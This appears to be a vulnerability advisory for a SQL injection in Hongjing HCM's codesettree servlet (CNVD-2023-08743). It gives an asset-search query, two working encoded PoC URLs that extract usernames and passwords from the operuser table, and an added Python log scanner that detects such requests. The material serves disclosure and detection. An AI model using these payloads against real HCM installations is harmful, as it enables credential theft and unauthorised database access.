Hongjing HCM codesettree SQL injection vulnerability CNVD-2023-08743
Vulnerability Description
The codesettree interface of Hongjing HCM has a SQL injection vulnerability. Through it, an attacker can obtain the account names and passwords used to log in to the system, along with other database information.
Vulnerability Impact
Hongjing HCM
Network asset mapping query
app="HJSOFT-HCM"
Vulnerability reproduction
Login page
Verification PoC
/servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27~31~27~2cusername~20from~20operuser~20~2d~2d
/servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27~31~27~2cpassword~20from~20operuser~20~2d~2d
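For detection, the requests above can be found in web access logs by decoding the `~XX` sequences before matching on SQL syntax. The following is an added example, not part of the original post or the vendor's code; it assumes `~XX` is a hex-encoded byte (as the payload's shape suggests) and a combined-format access log, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: "~XX" in the request is a hex-encoded byte decoded by the servlet.
TILDE_HEX = re.compile(r"~([0-9a-fA-F]{2})")
# SQL syntax that a code-set parameter should never carry once decoded.
SQL_TOKENS = re.compile(r"(?i)\bunion\b.*\bselect\b|\bselect\b.*\bfrom\b|--|'")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def decode_tilde(value: str) -> str:
    """Turn ~XX sequences into characters so matching sees the real text."""
    return TILDE_HEX.sub(lambda m: chr(int(m.group(1), 16)), value)

def inspect_line(line: str):
    """Return (param, decoded_value) for a suspicious codesettree request, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/servlet/codesettree"):
        return None
    for name, raw in parse_qsl(url.query, keep_blank_values=True):
        decoded = decode_tilde(raw)  # parse_qsl already undid %XX encoding
        if SQL_TOKENS.search(decoded):
            return name, decoded
    return None

def scan(lines):
    """Return [(line_index, param, decoded_value)] for every flagged log line."""
    hits = []
    for i, line in enumerate(lines):
        hit = inspect_line(line)
        if hit:
            hits.append((i, *hit))
    return hits

# Constructed sample log: one request shaped like the PoC, two benign requests.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Mar/2023:10:00:00 +0800] "GET /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27~31~27~2cusername~20from~20operuser~20~2d~2d HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Mar/2023:10:00:05 +0800] "GET /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=AB HTTP/1.1" 200 128',
    '192.0.2.12 - - [01/Mar/2023:10:00:09 +0800] "GET /index.jsp HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for idx, param, value in scan(SAMPLE_LOG):
        print(f"line {idx}: parameter {param!r} decodes to {value!r}")
```

Any hit on this endpoint is worth correlating with later logins to the HCM system, since the query targets the operuser account table.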
This post is licensed under CC BY 4.0 by the author.